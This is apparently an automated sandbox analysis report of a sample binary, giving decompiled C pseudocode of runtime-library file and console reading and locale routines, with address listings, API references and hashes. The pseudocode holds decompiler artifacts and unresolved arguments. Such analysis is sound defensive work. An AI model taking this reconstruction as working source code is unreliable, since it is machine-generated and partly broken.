																		__eflags =  *(_t426 - 8) - _t280;
																		if( *(_t426 - 8) == _t280) {
																			L142:
																			_push(0xd);
																			L143:
																			_pop(_t370);
																			goto L144;
																		}
																		_t370 = 0xd;
																		 *_t419 = _t370;
																		L151:
																		_t419 = _t419 + 2;
																		goto L144;
																	}
																	_t281 = 0xa;
																	__eflags =  *(_t426 - 8) - _t281;
																	if(__eflags != 0) {
																		goto L149;
																	}
																	 *_t419 = _t281;
																	_t419 = _t419 + 2;
																	goto L142;
																}
																_t282 = 0xa;
																_push(0xd);
																__eflags =  *(_t426 - 8) - _t282;
																if( *(_t426 - 8) != _t282) {
																	_pop(_t283);
																	 *_t419 = _t283;
																	_t419 = _t419 + 2;
																	__eflags = _t419;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *(_t426 - 8);
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x25)) =  *((intOrPtr*)(_t426 - 7));
																	_t374 = 0xa;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x26)) = _t374;
																	goto L142;
																}
																 *_t419 = _t282;
																_t419 = _t419 + 2;
																goto L143;
															}
															_t287 = GetLastError();
															__eflags = _t287;
															if(_t287 != 0) {
																goto L152;
															}
															goto L137;
														}
														_t392 = 0xa;
														__eflags = _t406[1] - _t392;
														_t391 =  *(_t426 - 0xc);
														if(_t406[1] != _t392) {
															 *_t419 = _t370;
															L134:
															_t419 = _t419 + 2;
															_t406 =  &(_t406[1]);
															goto L144;
														}
														_t288 = 0xa;
														_t406 =  &(_t406[2]);
														 *_t419 = _t288;
														goto L151;
													}
													 *_t419 = _t268;
													goto L134;
												}
												_t371 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
												_t269 =  *(_t371 + _t355 + 4);
												__eflags = _t269 & 0x00000040;
												if((_t269 & 0x00000040) != 0) {
													 *_t419 =  *_t406;
													_t419 = _t419 + 2;
													__eflags = _t419;
												} else {
													 *(_t371 + _t355 + 4) = _t269 | 0x00000002;
												}
												goto L156;
											}
											_t393 = 0xa;
											__eflags =  *( *(_t426 - 0x10)) - _t393;
											_t391 =  *(_t426 - 0xc);
											if( *( *(_t426 - 0x10)) != _t393) {
												goto L124;
											}
											_t266 = _t265 | 0x00000004;
											goto L125;
										}
										_t420 =  *(_t426 - 0x10);
										asm("cdq");
										_t407 = _t420;
										_t376 = _t420;
										_t291 = _t403 - _t391 >> 1;
										_t394 = _t407 + _t291 * 2;
										__eflags = _t407 - _t394;
										if(_t407 >= _t394) {
											L120:
											_t261 =  *(_t426 - 0x10);
											_t403 = _t420 - _t261 & 0xfffffffe;
											goto L99;
										}
										 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
										asm("sbb al, [eax]");
										 *_t291 =  *_t291 + _t291;
										__eflags =  *_t291;
										_t410 = 0xd;
										while(1) {
											_t292 =  *_t376 & 0x0000ffff;
											__eflags = _t292 -  *((intOrPtr*)(_t426 + 0x10));
											if(_t292 ==  *((intOrPtr*)(_t426 + 0x10))) {
												break;
											}
											__eflags = _t292 - _t410;
											if(_t292 == _t410) {
												__eflags = _t376 - _t394 - 2;
												if(_t376 < _t394 - 2) {
													_t376 = _t376 + 2;
													_t296 = 0xa;
													__eflags =  *_t376 - _t296;
													if( *_t376 != _t296) {
														_t296 = 0xd;
														_t410 = _t296;
													}
													 *_t420 = _t296;
													_t420 = _t420 + 2;
													__eflags = _t420;
												}
											} else {
												 *_t420 = _t292;
												_t420 = _t420 + 2;
												_t376 = _t376 + 2;
											}
											__eflags = _t376 - _t394;
											if(_t376 < _t394) {
												continue;
											} else {
												goto L120;
											}
										}
										_t294 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
										_t181 = _t294 + _t355 + 4;
										 *_t181 =  *(_t294 + _t355 + 4) | 0x00000002;
										__eflags =  *_t181;
										goto L120;
									}
									__eflags = _t368;
									if(_t368 == 0) {
										L43:
										_t297 = _t265 & 0x000000fb;
										__eflags = _t297;
										L44:
										 *(_t418 + _t355 + 4) = _t297;
										_t298 =  *(_t426 - 0x10);
										_t421 = _t298;
										 *(_t426 - 0x20) = _t298;
										_t377 = _t298 + _t403;
										 *(_t426 - 0x1c) = _t377;
										__eflags = _t298 - _t377;
										if(_t298 >= _t377) {
											L75:
											_t261 =  *(_t426 - 0x10);
											_t403 = _t421 - _t261;
											__eflags =  *((char*)(_t426 + 0x13)) - 1;
											if( *((char*)(_t426 + 0x13)) != 1) {
												goto L99;
											}
											__eflags = _t403;
											if(_t403 == 0) {
												goto L99;
											}
											_t422 = _t421 - 1;
											_t299 =  *_t422;
											__eflags = _t299;
											if(_t299 < 0) {
												_t300 = _t299 & 0x000000ff;
												_t396 = 1;
												__eflags =  *((char*)(_t300 + 0x9ce408));
												if( *((char*)(_t300 + 0x9ce408)) != 0) {
													L85:
													_t302 =  *((char*)(( *_t422 & 0x000000ff) + 0x9ce408));
													__eflags = _t302;
													if(_t302 != 0) {
														__eflags = _t302 + 1 - _t396;
														if(_t302 + 1 != _t396) {
															_t378 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
															__eflags =  *(_t378 + _t355 + 4) & 0x00000048;
															if(__eflags == 0) {
																asm("cdq");
																E009B3F56(_t378, __eflags,  *((intOrPtr*)(_t426 + 8)),  ~_t396,  ~_t396, 1);
															} else {
																_t424 =  &(_t422[1]);
																 *((char*)(_t378 + _t355 + 5)) =  *_t422;
																_t313 =  *(_t426 - 0xc);
																__eflags = _t396 - 2;
																if(_t396 >= 2) {
																	_t315 =  *_t424;
																	_t424 = _t424 + 1;
																	__eflags = _t424;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x25)) = _t315;
																	_t313 =  *(_t426 - 0xc);
																}
																__eflags = _t396 - 3;
																if(_t396 == 3) {
																	_t314 =  *_t424;
																	_t424 = _t424 + 1;
																	__eflags = _t424;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x26)) = _t314;
																}
																_t422 = _t424 - _t396;
															}
														} else {
															_t422 =  &(_t422[_t396]);
														}
														L96:
														_t412 =  *(_t426 - 0x10);
														_t423 = _t422 - _t412;
														_t403 = MultiByteToWideChar(0xfde9, 0, _t412, _t423,  *(_t426 + 0xc),  *(_t426 - 0x28) >> 1);
														__eflags = _t403;
														if(_t403 == 0) {
															goto L29;
														}
														__eflags = _t403 - _t423;
														_t380 = 0 | _t403 != _t423;
														_t403 = _t403 + _t403;
														__eflags = _t403;
														 *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355 + 0x30) = _t380;
														goto L98;
													}
													 *((intOrPtr*)(E009AF100())) = 0x2a;
													L31:
													_t357 = _t355 | 0xffffffff;
													L32:
													_t261 =  *(_t426 - 0x10);
													goto L101;
												}
												_t358 =  *(_t426 - 0x10);
												while(1) {
													__eflags = _t396 - 4;
													if(_t396 > 4) {
														break;
													}
													__eflags = _t422 - _t358;
													if(_t422 < _t358) {
														break;
													}
													_t422 = _t422 - 1;
													_t396 = _t396 + 1;
													_t317 =  *_t422 & 0x000000ff;
													__eflags =  *((char*)(_t317 + 0x9ce408));
													if( *((char*)(_t317 + 0x9ce408)) == 0) {
														continue;
													}
													break;
												}
												_t355 =  *(_t426 - 0x24);
												goto L85;
											}
											_t422 =  &(_t422[1]);
											goto L96;
										}
										_t383 = 0xd;
										_t413 = _t298;
										while(1) {
											_t318 =  *_t413;
											__eflags = _t318 - 0x1a;
											if(_t318 == 0x1a) {
												break;
											}
											__eflags = _t318 - _t383;
											if(_t318 == _t383) {
												__eflags = _t413 -  *(_t426 - 0x1c) - 1;
												if(_t413 >=  *(_t426 - 0x1c) - 1) {
													_push(0);
													_t413 = _t413 + 1;
													__eflags = _t413;
													_push(_t426 - 0x14);
													_push(1);
													 *((intOrPtr*)(_t426 - 0x74af00bb)) =  *((intOrPtr*)(_t426 - 0x74af00bb)) + _t383;
													asm("pushfd");
													_t355 = _t355 + _t355;
													_t327 = ReadFile(??, ??, ??, ??, ??);
													__eflags = _t327;
													if(_t327 != 0) {
														L56:
														__eflags =  *(_t426 - 0x14);
														if( *(_t426 - 0x14) == 0) {
															goto L71;
														}
														_t391 =  *(_t426 - 0xc);
														_t328 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
														__eflags =  *(_t328 + _t355 + 4) & 0x00000048;
														if(( *(_t328 + _t355 + 4) & 0x00000048) == 0) {
															__eflags = _t421 -  *(_t426 - 0x10);
															if(__eflags != 0) {
																L68:
																E009B3F56(_t383, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xffffffff, 0xffffffff, 1);
																_t391 =  *(_t426 - 0xc);
																_t428 = _t428 + 0x10;
																_t330 = 0xa;
																__eflags =  *((intOrPtr*)(_t426 - 1)) - _t330;
																if( *((intOrPtr*)(_t426 - 1)) == _t330) {
																	L64:
																	_push(0xd);
																	L65:
																	_pop(_t383);
																	goto L66;
																}
																_t383 = 0xd;
																 *_t421 = _t383;
																L70:
																_t421 = _t421 + 1;
																goto L66;
															}
															_t331 = 0xa;
															__eflags =  *((intOrPtr*)(_t426 - 1)) - _t331;
															if(__eflags != 0) {
																goto L68;
															}
															 *_t421 = _t331;
															_t421 = _t421 + 1;
															__eflags = _t421;
															goto L64;
														}
														_t332 = 0xa;
														_push(0xd);
														__eflags =  *((intOrPtr*)(_t426 - 1)) - _t332;
														if( *((intOrPtr*)(_t426 - 1)) != _t332) {
															 *_t421 = 0xd;
															_t421 = _t421 + 1;
															 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *((intOrPtr*)(_t426 - 1));
														} else {
															 *_t421 = _t332;
															_t421 = _t421 + 1;
														}
														goto L65;
													} else {
														_t334 = GetLastError();
														__eflags = _t334;
														if(_t334 != 0) {
															L71:
															_t391 =  *(_t426 - 0xc);
															_t383 = 0xd;
															 *_t421 = _t383;
															_t421 = _t421 + 1;
															L66:
															__eflags = _t413 -  *(_t426 - 0x1c);
															if(_t413 <  *(_t426 - 0x1c)) {
																continue;
															}
															goto L75;
														}
														goto L56;
													}
												}
												_t98 = _t413 + 1; // 0x9b2b48
												_t335 = _t98;
												__eflags =  *_t335 - 0xa;
												if( *_t335 != 0xa) {
													 *_t421 = _t383;
													_t413 = _t335;
													_t421 = _t421 + 1;
													goto L66;
												}
												_t336 = 0xa;
												_t413 = _t413 + 2;
												 *_t421 = _t336;
												goto L70;
											}
											 *_t421 = _t318;
											_t421 = _t421 + 1;
											_t413 = _t413 + 1;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
										_t319 =  *(_t384 + _t355 + 4);
										__eflags = _t319 & 0x00000040;
										if((_t319 & 0x00000040) != 0) {
											 *_t421 =  *_t413;
											_t421 = _t421 + 1;
											__eflags = _t421;
										} else {
											 *(_t384 + _t355 + 4) = _t319 | 0x00000002;
										}
										goto L75;
									}
									__eflags =  *( *(_t426 - 0x10)) - 0xa;
									if( *( *(_t426 - 0x10)) != 0xa) {
										goto L43;
									}
									_t297 = _t265 | 0x00000004;
									goto L44;
								}
								L29:
								_t259 = GetLastError();
								L30:
								E009AF0DF(_t259);
								goto L31;
							}
						}
					}
					if(( !__esi & 0x00000001) == 0) {
						L2:
						 *(E009AF0CC()) =  *_t248 & _t403;
						 *((intOrPtr*)(E009AF100())) = 0x16;
						_t250 = E009AEB1E();
						L162:
						_t251 = _t250 | 0xffffffff;
						__eflags = _t251;
						goto L163;
					} else {
						_t415 = __esi & 0xfffffffe;
						goto L7;
					}
				}
			}



































































































                                                          0x009a28a2
                                                          0x009a28a2
                                                          0x009a28a2
                                                          0x009af901
                                                          0x009af908
                                                          0x009af922
                                                          0x009af924
                                                          0x009af926
                                                          0x00000000
                                                          0x009af928
                                                          0x009af928
                                                          0x009af92a
                                                          0x009af92d
                                                          0x009af931
                                                          0x009af931
                                                          0x009af933
                                                          0x009af938
                                                          0x009af93b
                                                          0x009af93c
                                                          0x009af93e
                                                          0x009af964
                                                          0x009af96c
                                                          0x009af96f
                                                          0x009af976
                                                          0x009af97a
                                                          0x009af97d
                                                          0x009af981
                                                          0x00000000
                                                          0x009af940
                                                          0x009af945
                                                          0x009af94b
                                                          0x009af950
                                                          0x00000000
                                                          0x009af950
                                                          0x009af93e
                                                          0x009af90a
                                                          0x009af90b
                                                          0x009af918
                                                          0x009af918
                                                          0x009af91b
                                                          0x009af984
                                                          0x009af984
                                                          0x009af98b
                                                          0x009af98e
                                                          0x009af996
                                                          0x009af99c
                                                          0x009af9a3
                                                          0x009af9a9
                                                          0x009af9ad
                                                          0x009af9ad
                                                          0x009af9b0
                                                          0x009af9b8
                                                          0x009af9bd
                                                          0x009af9c0
                                                          0x009af9c5
                                                          0x009af9ce
                                                          0x009af9ce
                                                          0x009af9d4
                                                          0x009af9da
                                                          0x009af9dc
                                                          0x009af9e4
                                                          0x009af9eb
                                                          0x009af9ee
                                                          0x009af9ef
                                                          0x009af9f4
                                                          0x009af9fd
                                                          0x009afa03
                                                          0x009afa0b
                                                          0x009afa15
                                                          0x009afa16
                                                          0x009afa19
                                                          0x009afa1a
                                                          0x009afa1d
                                                          0x009afa1d
                                                          0x009afa03
                                                          0x009af9f4
                                                          0x009af9d4
                                                          0x009af9c5
                                                          0x009af9a3
                                                          0x009afa24
                                                          0x009afa2b
                                                          0x009afa2f
                                                          0x009afaa2
                                                          0x009afab6
                                                          0x009afabc
                                                          0x009afabe
                                                          0x009aff82
                                                          0x009aff82
                                                          0x009aff8a
                                                          0x009aff8b
                                                          0x009aff8d
                                                          0x009affa6
                                                          0x009affa9
                                                          0x00000000
                                                          0x00000000
                                                          0x009affaf
                                                          0x00000000
                                                          0x009affaf
                                                          0x009aff94
                                                          0x009aff9f
                                                          0x00000000
                                                          0x009aff9f
                                                          0x009afac4
                                                          0x009afac7
                                                          0x009afac9
                                                          0x00000000
                                                          0x00000000
                                                          0x009afacf
                                                          0x009afad1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afa31
                                                          0x009afa31
                                                          0x009afa3d
                                                          0x00000000
                                                          0x00000000
                                                          0x009afa46
                                                          0x009afa4c
                                                          0x009afa51
                                                          0x009afa9f
                                                          0x00000000
                                                          0x009afa59
                                                          0x009afa7a
                                                          0x009afa97
                                                          0x009afa9a
                                                          0x009afad7
                                                          0x009afad7
                                                          0x009afada
                                                          0x009afadc
                                                          0x009afae3
                                                          0x009afae3
                                                          0x009afae7
                                                          0x009afae9
                                                          0x009afd46
                                                          0x009afd46
                                                          0x009afd49
                                                          0x009afd49
                                                          0x009afd4b
                                                          0x009afd4c
                                                          0x009afd4f
                                                          0x009afd52
                                                          0x009afd57
                                                          0x009afd5b
                                                          0x009afd5d
                                                          0x009afd5d
                                                          0x009afd5f
                                                          0x009affd4
                                                          0x009affda
                                                          0x009affda
                                                          0x009afaef
                                                          0x009afaf3
                                                          0x009afd66
                                                          0x009afd6a
                                                          0x009afde5
                                                          0x009afde7
                                                          0x009afdfb
                                                          0x009afdfb
                                                          0x009afdfb
                                                          0x009afdfd
                                                          0x009afdfd
                                                          0x009afe01
                                                          0x009afe04
                                                          0x009afe06
                                                          0x009afe09
                                                          0x009afe0c
                                                          0x009afe0f
                                                          0x009afe11
                                                          0x009aff76
                                                          0x009aff76
                                                          0x009aff7b
                                                          0x00000000
                                                          0x009aff7b
                                                          0x009afe19
                                                          0x009afe1a
                                                          0x009afe21
                                                          0x009afe23
                                                          0x009afe23
                                                          0x009afe26
                                                          0x009afe2a
                                                          0x00000000
                                                          0x00000000
                                                          0x009afe30
                                                          0x009afe33
                                                          0x009afe40
                                                          0x009afe42
                                                          0x009afe71
                                                          0x009afe85
                                                          0x009afe8b
                                                          0x009afe8d
                                                          0x009afe9d
                                                          0x009afe9d
                                                          0x009afea1
                                                          0x009aff48
                                                          0x009aff48
                                                          0x009aff4d
                                                          0x009aff4e
                                                          0x009aff51
                                                          0x009afeff
                                                          0x009afeff
                                                          0x009aff02
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009aff08
                                                          0x009afea7
                                                          0x009afeaa
                                                          0x009afeb1
                                                          0x009afeb6
                                                          0x009aff0a
                                                          0x009aff0d
                                                          0x009aff20
                                                          0x009aff29
                                                          0x009aff2e
                                                          0x009aff31
                                                          0x009aff36
                                                          0x009aff37
                                                          0x009aff3b
                                                          0x009afefc
                                                          0x009afefc
                                                          0x009afefe
                                                          0x009afefe
                                                          0x00000000
                                                          0x009afefe
                                                          0x009aff3f
                                                          0x009aff40
                                                          0x009aff43
                                                          0x009aff43
                                                          0x00000000
                                                          0x009aff43
                                                          0x009aff11
                                                          0x009aff12
                                                          0x009aff16
                                                          0x00000000
                                                          0x00000000
                                                          0x009aff18
                                                          0x009aff1b
                                                          0x00000000
                                                          0x009aff1b
                                                          0x009afeba
                                                          0x009afebb
                                                          0x009afebd
                                                          0x009afec1
                                                          0x009afecb
                                                          0x009afecc
                                                          0x009afecf
                                                          0x009afecf
                                                          0x009afede
                                                          0x009afeec
                                                          0x009afef7
                                                          0x009afef8
                                                          0x00000000
                                                          0x009afef8
                                                          0x009afec3
                                                          0x009afec6
                                                          0x00000000
                                                          0x009afec6
                                                          0x009afe8f
                                                          0x009afe95
                                                          0x009afe97
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afe97
                                                          0x009afe46
                                                          0x009afe47
                                                          0x009afe4b
                                                          0x009afe4e
                                                          0x009afe5e
                                                          0x009afe61
                                                          0x009afe61
                                                          0x009afe64
                                                          0x00000000
                                                          0x009afe64
                                                          0x009afe52
                                                          0x009afe53
                                                          0x009afe56
                                                          0x00000000
                                                          0x009afe56
                                                          0x009afe35
                                                          0x00000000
                                                          0x009afe35
                                                          0x009aff56
                                                          0x009aff5d
                                                          0x009aff61
                                                          0x009aff63
                                                          0x009aff70
                                                          0x009aff73
                                                          0x009aff73
                                                          0x009aff65
                                                          0x009aff67
                                                          0x009aff67
                                                          0x00000000
                                                          0x009aff63
                                                          0x009afdee
                                                          0x009afdef
                                                          0x009afdf2
                                                          0x009afdf5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afdf7
                                                          0x00000000
                                                          0x009afdf7
                                                          0x009afd6c
                                                          0x009afd71
                                                          0x009afd72
                                                          0x009afd76
                                                          0x009afd78
                                                          0x009afd7a
                                                          0x009afd7d
                                                          0x009afd7f
                                                          0x009afdd6
                                                          0x009afdd6
                                                          0x009afddd
                                                          0x00000000
                                                          0x009afddd
                                                          0x009afd83
                                                          0x009afd86
                                                          0x009afd88
                                                          0x009afd88
                                                          0x009afd8a
                                                          0x009afd8b
                                                          0x009afd8b
                                                          0x009afd8e
                                                          0x009afd92
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd94
                                                          0x009afd97
                                                          0x009afda7
                                                          0x009afda9
                                                          0x009afdab
                                                          0x009afdb0
                                                          0x009afdb1
                                                          0x009afdb4
                                                          0x009afdb8
                                                          0x009afdba
                                                          0x009afdba
                                                          0x009afdbb
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afd99
                                                          0x009afd99
                                                          0x009afd9c
                                                          0x009afd9f
                                                          0x009afd9f
                                                          0x009afdc1
                                                          0x009afdc3
                                                          0x00000000
                                                          0x009afdc5
                                                          0x00000000
                                                          0x009afdc5
                                                          0x009afdc3
                                                          0x009afdca
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x00000000
                                                          0x009afdd1
                                                          0x009afaf9
                                                          0x009afafb
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb0b
                                                          0x009afb0b
                                                          0x009afb0f
                                                          0x009afb12
                                                          0x009afb14
                                                          0x009afb17
                                                          0x009afb1a
                                                          0x009afb1d
                                                          0x009afb1f
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3a
                                                          0x009afc3e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc44
                                                          0x009afc46
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc4f
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc85
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd27
                                                          0x009afd29
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd34
                                                          0x009afd36
                                                          0x009afd39
                                                          0x009afd39
                                                          0x009afd42
                                                          0x00000000
                                                          0x009afd42
                                                          0x009afc98
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afa8c
                                                          0x00000000
                                                          0x009afa8c
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x009afc82
                                                          0x00000000
                                                          0x009afc82
                                                          0x009afc53
                                                          0x00000000
                                                          0x009afc53
                                                          0x009afb27
                                                          0x009afb28
                                                          0x009afb2a
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb7c
                                                          0x009afb82
                                                          0x009afb84
                                                          0x009afb90
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb99
                                                          0x009afba0
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x009afbda
                                                          0x009afbda
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x00000000
                                                          0x009afbdc
                                                          0x009afc06
                                                          0x009afc07
                                                          0x009afc09
                                                          0x009afc09
                                                          0x00000000
                                                          0x009afc09
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x00000000
                                                          0x009afbd9
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbac
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x00000000
                                                          0x009afb86
                                                          0x009afb86
                                                          0x009afb8c
                                                          0x009afb8e
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x009afbdd
                                                          0x009afbdd
                                                          0x009afbe0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbe6
                                                          0x00000000
                                                          0x009afb8e
                                                          0x009afb84
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x00000000
                                                          0x009afb62
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x00000000
                                                          0x009afb57
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb3b
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x00000000
                                                          0x009afc24
                                                          0x009afb00
                                                          0x009afb03
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb05
                                                          0x00000000
                                                          0x009afb05
                                                          0x009afa7c
                                                          0x009afa7c
                                                          0x009afa82
                                                          0x009afa83
                                                          0x00000000
                                                          0x009afa88
                                                          0x009afa51
                                                          0x009afa2f
                                                          0x009af913
                                                          0x009af8f0
                                                          0x009af8f5
                                                          0x009af8d0
                                                          0x009affcc
                                                          0x009affd1
                                                          0x009affd1
                                                          0x009affd1
                                                          0x00000000
                                                          0x009af915
                                                          0x009af915
                                                          0x00000000
                                                          0x009af915
                                                          0x009af913

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009AF933
                                                          • GetConsoleMode.KERNEL32 ref: 009AFA46
                                                          • ReadConsoleW.KERNEL32(?,?,009B2B47,?,00000000), ref: 009AFA72
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?), ref: 009AFA7C
                                                          • __dosmaperr.LIBCMT ref: 009AFA83
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                                                          • String ID:
                                                          • API String ID: 3470617983-0
                                                          • Opcode ID: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction ID: 992db9ccb05113db84f02c962f3552eadaae0e2fcbb6f8b591836f2c90ec76f2
                                                          • Opcode Fuzzy Hash: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction Fuzzy Hash: 2141EA70E146858ECB26CFDC9C64BE9BBA9AB47314F054175EC588B2A2D730CD0AC7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6AE8 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E009A6AE8(void* __ebx, signed int __edx) {
				intOrPtr _t43;
				void* _t55;
				signed int _t69;
				signed int _t70;
				signed int _t75;
				intOrPtr _t77;
				signed int _t82;
				void* _t83;

				_t75 = __edx;
				_t61 = __ebx;
				_t86 = __ebx;
				if(__ebx == 0) {
					L24:
					return E009AF225(_t77);
				} else {
					memcpy(__ebx,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68), 0x88 << 2);
					_t82 = 0;
					 *__ebx = 0;
					_t77 = E009B48E9(_t75,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68) + 0x110, _t86,  *((intOrPtr*)(_t83 + 8)), __ebx);
					 *((intOrPtr*)(_t83 + 8)) = _t77;
					if(_t77 != 0) {
						__eflags = _t77 - 0xffffffff;
						if(_t77 == 0xffffffff) {
							__eflags = __ebx - 0x9ceac8;
							if(__ebx != 0x9ceac8) {
								E009B2248(__ebx);
							}
							 *((intOrPtr*)(E009AF100())) = 0x16;
						}
						goto L24;
					}
					_t43 =  *((intOrPtr*)(_t83 - 0x20));
					asm("lock xadd [ecx], edx");
					if((_t75 | 0xffffffff) == 0) {
						_t73 =  *(_t43 + 0x68);
						if( *(_t43 + 0x68) != 0x9ceac8) {
							E009B2248(_t73);
							_t43 =  *((intOrPtr*)(_t83 - 0x20));
						}
					}
					 *(_t43 + 0x68) = _t61;
					asm("lock xadd [ebx], eax");
					if(( *( *((intOrPtr*)(_t83 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0x9cee10 & 0x00000001) == 0) {
						E009B20A9(0xd);
						 *(_t83 - 4) = _t82;
						 *0x9cfcd4 =  *((intOrPtr*)(_t61 + 4));
						 *0x9cfcd8 =  *((intOrPtr*)(_t61 + 8));
						 *0x9cfce8 =  *((intOrPtr*)(_t61 + 0x21c));
						_t69 = _t82;
						while(1) {
							 *(_t83 - 0x1c) = _t69;
							if(_t69 >= 5) {
								break;
							}
							 *((short*)(0x9cfcdc + _t69 * 2)) =  *((intOrPtr*)(_t61 + 0xc + _t69 * 2));
							_t69 = _t69 + 1;
						}
						_t70 = _t82;
